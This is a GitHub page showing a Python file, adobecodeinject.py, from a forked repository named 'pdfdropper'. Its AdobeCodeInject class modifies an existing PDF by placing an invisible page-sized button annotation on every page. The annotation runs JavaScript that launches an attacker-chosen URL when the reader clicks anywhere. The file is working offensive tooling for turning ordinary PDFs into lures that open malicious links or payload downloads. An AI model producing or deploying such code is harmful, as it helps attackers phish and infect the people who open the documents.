forked from 0x6rss/pdfdropper
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathadobecodeinject.py
43 lines (39 loc) · 1.49 KB
/
adobecodeinject.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
from core import *
from core.imp import *
class AdobeCodeInject():
def __init__(self, target_url: str) -> None:
self.target_url = target_url
def _make_action(self) -> DictionaryObject:
js_code = f"""
try {{
app.launchURL('{self.target_url}', true);
}} catch (e) {{
app.alert('Error: ' + e.message);
}}
"""
return DictionaryObject({
NameObject("/S"): NameObject("/JavaScript"),
NameObject("/JS"): TextStringObject(js_code),
})
def _make_annot(self, rect: RectangleObject, action: IndirectObject) -> DictionaryObject:
annot = DictionaryObject({
NameObject("/Type"): NameObject("/Annot"),
NameObject("/Subtype"): NameObject("/Widget"),
NameObject("/Rect"): rect,
NameObject("/FT"): NameObject("/Btn"),
NameObject("/T"): TextStringObject("Open URL"),
NameObject("/Ff"): NumberObject(4),
NameObject("/A"): action,
})
return annot
def exploit(self, pdf: Pdf):
action = self._make_action()
for p in pdf.pages:
arct = p.artbox
if not isinstance(arct, RectangleObject):
arct = p.mediabox
if not isinstance(arct, RectangleObject):
arct = p.bleedbox
print(f"{p.page_number} use arct: {arct}")
annot = self._make_annot(arct, pdf.add_object(action))
pdf.add_annotation(p, annot)